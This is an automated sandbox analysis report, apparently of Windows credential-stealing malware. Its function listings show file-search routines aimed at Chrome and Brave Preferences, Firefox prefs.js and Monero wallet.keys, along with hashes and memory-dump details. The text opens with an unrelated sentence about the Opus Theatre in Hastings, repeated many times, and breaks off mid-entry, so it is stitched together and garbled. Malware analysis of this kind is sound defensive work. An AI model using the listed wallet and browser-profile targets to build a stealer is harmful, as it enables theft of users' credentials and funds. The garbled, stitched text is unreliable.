and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
API String ID: 1542196881-2218711628
Opcode ID: 51cb4c929c46d03146ee595156db3b04a162be6b7dab8034f6affa9d7a2ee205
Instruction ID: ed40af029cd2c929a438bbd0d1a82b883a1a7003e303542f452b64cea63baed1
Opcode Fuzzy Hash: 51cb4c929c46d03146ee595156db3b04a162be6b7dab8034f6affa9d7a2ee205
Instruction Fuzzy Hash: F5413820EDB6147AE724B7B7A8E1DBD77977F46F09F509842AC2112383CBF0650065D1

Function 00ABBE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00ACA740: lstrcpy.KERNEL32(00AD0E17,00000000), ref: 00ACA788

Part of subcall function 00ACA920: lstrcpy.KERNEL32(00000000,?), ref: 00ACA972
Part of subcall function 00ACA920: lstrcat.KERNEL32(00000000), ref: 00ACA982

Part of subcall function 00ACA9B0: lstrlen.KERNEL32(?,005E8CA8,?,\Monero\wallet.keys,00AD0E17), ref: 00ACA9C5
Part of subcall function 00ACA9B0: lstrcpy.KERNEL32(00000000), ref: 00ACAA04
Part of subcall function 00ACA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00ACAA12

Part of subcall function 00ACA8A0: lstrcpy.KERNEL32(?,00AD0E17), ref: 00ACA905

FindFirstFileA.KERNEL32(00000000,?,00AD0B32,00AD0B2B,00000000,?,?,?,00AD13F4,00AD0B2A), ref: 00ABBEF5
StrCmpCA.SHLWAPI(?,00AD13F8), ref: 00ABBF4D
StrCmpCA.SHLWAPI(?,00AD13FC), ref: 00ABBF63
FindNextFileA.KERNEL32(000000FF,?), ref: 00ABC7BF
FindClose.KERNEL32(000000FF), ref: 00ABC7D1

Strings

Preferences, xrefs: 00ABC11E
Google Chrome, xrefs: 00ABC634
Brave, xrefs: 00ABC102
\Brave\Preferences, xrefs: 00ABC1DB

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
API String ID: 3334442632-726946144
Opcode ID: a774d9413b667ee19f53b53cacc999e5d5d09dd500cfebf2e6e2011d578397bd
Instruction ID: f46d2ca4a14ae22e26e31ef049178d50cd8f6d6cb64cf9be69fe171a26d02daf
Opcode Fuzzy Hash: a774d9413b667ee19f53b53cacc999e5d5d09dd500cfebf2e6e2011d578397bd
Instruction Fuzzy Hash: 99423372910108ABCB14FB70DE96FFD737DABA4304F41455CB50AA6191EE34AF49CBA2

Function 6CAD35A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(6CB5F688,00001000), ref: 6CAD35D5
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6CAD35E0
QueryPerformanceFrequency.KERNEL32(?), ref: 6CAD35FD
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6CAD363F
GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6CAD369F
__aulldiv.LIBCMT ref: 6CAD36E4
QueryPerformanceCounter.KERNEL32(?), ref: 6CAD3773
EnterCriticalSection.KERNEL32(6CB5F688), ref: 6CAD377E
LeaveCriticalSection.KERNEL32(6CB5F688), ref: 6CAD37BD
QueryPerformanceCounter.KERNEL32(?), ref: 6CAD37C4
EnterCriticalSection.KERNEL32(6CB5F688), ref: 6CAD37CB
LeaveCriticalSection.KERNEL32(6CB5F688), ref: 6CAD3801
__aulldiv.LIBCMT ref: 6CAD3883
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6CAD3902
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6CAD3918
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6CAD394C

Strings

AuthcAMDenti, xrefs: 6CAD3946
GTC, xrefs: 6CAD3912
GenuntelineI, xrefs: 6CAD3639
QPC, xrefs: 6CAD38FC
MOZ_TIMESTAMP_MODE, xrefs: 6CAD35DB

Memory Dump Source

Source File: 00000000.00000002.2456589135.000000006CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAD0000, based on PE: true

Associated: 00000000.00000002.2456560223.000000006CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456636137.000000006CB4D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456651859.000000006CB5E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456666418.000000006CB62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cad0000_file.jbxd

Similarity

API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
API String ID: 301339242-3790311718
Opcode ID: 5e96fb7d18b8b5dbf1460e66221b83ccb48ed61ab5a8d84835a39602ae7b113f
Instruction ID: 95bf5db5b0ebb5880c8b0fa89e6741b461b4431e1eda18075855c6483917fb64
Opcode Fuzzy Hash: 5e96fb7d18b8b5dbf1460e66221b83ccb48ed61ab5a8d84835a39602ae7b113f
Instruction Fuzzy Hash: DDB1E671B093509FDB08DF28C85461ABBF6FB8A704F49892EE899D7790D774A844CB81

Function 00AC4910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00AC492C
FindFirstFileA.KERNEL32(?,?), ref: 00AC4943
StrCmpCA.SHLWAPI(?,00AD0FDC), ref: 00AC4971
StrCmpCA.SHLWAPI(?,00AD0FE0), ref: 00AC4987
FindNextFileA.KERNEL32(000000FF,?), ref: 00AC4B7D
FindClose.KERNEL32(000000FF), ref: 00AC4B92

Strings

%s\%s, xrefs: 00AC49A4
%s\*, xrefs: 00AC4920
%s\%s, xrefs: 00AC49FB

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$%s\%s$%s\*
API String ID: 180737720-445461498
Opcode ID: 7db633d3126b2542c011d132c77929cf1af69ba1e9a15bfb06ac0344e3001c93
Instruction ID: f3e7cc9d2c8d2c45c54bbfb582ec518551ab31ad9ca97d57accb90e9f68a52d2
Opcode Fuzzy Hash: 7db633d3126b2542c011d132c77929cf1af69ba1e9a15bfb06ac0344e3001c93
Instruction Fuzzy Hash: 386123B1910218ABCB24EBA0DC55FFEB37CBB4C700F04458DB50E96141EA75AB85CFA6

Function 00AC3EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00AC3EC3
FindFirstFileA.KERNEL32(?,?), ref: 00AC3EDA
StrCmpCA.SHLWAPI(?,00AD0FAC), ref: 00AC3F08
StrCmpCA.SHLWAPI(?,00AD0FB0), ref: 00AC3F1E
FindNextFileA.KERNEL32(000000FF,?), ref: 00AC406C
FindClose.KERNEL32(000000FF), ref: 00AC4081

Strings

%s\%s, xrefs: 00AC3EB7

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s
API String ID: 180737720-4073750446
Opcode ID: 60e360373b96812645b9caa2b852b54d018ad3cd971b21e1eeb5ab5e6f0b204c
Instruction ID: 19af8d338823cc80d3279cbcde7ac5d9cd45f5f4448a9a4afc6793ec2674cb6a
Opcode Fuzzy Hash: 60e360373b96812645b9caa2b852b54d018ad3cd971b21e1eeb5ab5e6f0b204c
Instruction Fuzzy Hash: EE5133B2900218ABCB24EBB0DD45FFEB37CBB48300F40458DB65D96080DA759B85CF96

Function 00ABDA80 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00ACA740: lstrcpy.KERNEL32(00AD0E17,00000000), ref: 00ACA788

Part of subcall function 00ACA920: lstrcpy.KERNEL32(00000000,?), ref: 00ACA972
Part of subcall function 00ACA920: lstrcat.KERNEL32(00000000), ref: 00ACA982

Part of subcall function 00ACA9B0: lstrlen.KERNEL32(?,005E8CA8,?,\Monero\wallet.keys,00AD0E17), ref: 00ACA9C5
Part of subcall function 00ACA9B0: lstrcpy.KERNEL32(00000000), ref: 00ACAA04
Part of subcall function 00ACA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00ACAA12

Part of subcall function 00ACA8A0: lstrcpy.KERNEL32(?,00AD0E17), ref: 00ACA905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00AD14B0,00AD0C2A), ref: 00ABDAEB
StrCmpCA.SHLWAPI(?,00AD14B4), ref: 00ABDB33
StrCmpCA.SHLWAPI(?,00AD14B8), ref: 00ABDB49
FindNextFileA.KERNELBASE(000000FF,?), ref: 00ABDDCC
FindClose.KERNEL32(000000FF), ref: 00ABDDDE

Strings

H^, xrefs: 00ABDC39

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: H^
API String ID: 3334442632-856137936
Opcode ID: 1e6a41f508de0e88fe57c360574c47d97b80013fd837e6853750b5bd99e4ccf7
Instruction ID: 555dbc27601b530d867d2ef728960deb073647a64bc58573f4ef2a5ab29dec0f
Opcode Fuzzy Hash: 1e6a41f508de0e88fe57c360574c47d97b80013fd837e6853750b5bd99e4ccf7
Instruction Fuzzy Hash: 7B9112B2900108ABCB14FB70ED56FFD737DAB94344F41866DB90A96181FE349B19CB92

Function 00ABF6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00ACA740: lstrcpy.KERNEL32(00AD0E17,00000000), ref: 00ACA788

Part of subcall function 00ACA920: lstrcpy.KERNEL32(00000000,?), ref: 00ACA972
Part of subcall function 00ACA920: lstrcat.KERNEL32(00000000), ref: 00ACA982

Part of subcall function 00ACA9B0: lstrlen.KERNEL32(?,005E8CA8,?,\Monero\wallet.keys,00AD0E17), ref: 00ACA9C5
Part of subcall function 00ACA9B0: lstrcpy.KERNEL32(00000000), ref: 00ACAA04
Part of subcall function 00ACA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00ACAA12

Part of subcall function 00ACA8A0: lstrcpy.KERNEL32(?,00AD0E17), ref: 00ACA905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00AD15B8,00AD0D96), ref: 00ABF71E
StrCmpCA.SHLWAPI(?,00AD15BC), ref: 00ABF76F
StrCmpCA.SHLWAPI(?,00AD15C0), ref: 00ABF785
FindNextFileA.KERNELBASE(000000FF,?), ref: 00ABFAB1
FindClose.KERNEL32(000000FF), ref: 00ABFAC3

Strings

prefs.js, xrefs: 00ABF812

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: prefs.js
API String ID: 3334442632-3783873740
Opcode ID: 372cc5b72487d0637093b82afeb4b375cbdb65578911a01f62616db5a56e07de
Instruction ID: 077a4d60a322060cf8a7f345866f510ababf0983fda2d1bf4bf7e9a22fc92dee
Opcode Fuzzy Hash: 372cc5b72487d0637093b82afeb4b375cbdb65578911a01f62616db5a56e07de
Instruction Fuzzy Hash: D8B112719001189BDB24FF60DD96FFE7379AF64304F4185ADA40A96192EF306B49CB92

Function 00AB16D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00ACA740: lstrcpy.KERNEL32(00AD0E17,00000000), ref: 00ACA788

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00AD510C,?,?,?,00AD51B4,?,?,00000000,?,00000000), ref: 00AB1923
StrCmpCA.SHLWAPI(?,00AD525C), ref: 00AB1973
StrCmpCA.SHLWAPI(?,00AD5304), ref: 00AB1989
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00AB1D40
DeleteFileA.KERNEL32(00000000), ref: 00AB1DCA
FindNextFileA.KERNEL32(000000FF,?), ref: 00AB1E20
FindClose.KERNEL32(000000FF), ref: 00AB1E32

Part of subcall function 00ACA920: lstrcpy.KERNEL32(00000000,?), ref: 00ACA972
Part of subcall function 00ACA920: lstrcat.KERNEL32(00000000), ref: 00ACA982

Part of subcall function 00ACA9B0: lstrlen.KERNEL32(?,005E8CA8,?,\Monero\wallet.keys,00AD0E17), ref: 00ACA9C5
Part of subcall function 00ACA9B0: lstrcpy.KERNEL32(00000000), ref: 00ACAA04
Part of subcall function 00ACA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00ACAA12

Part of subcall function 00ACA8A0: lstrcpy.KERNEL32(?,00AD0E17), ref: 00ACA905

Strings

\*.*, xrefs: 00AB17F1

Memory Dump Source

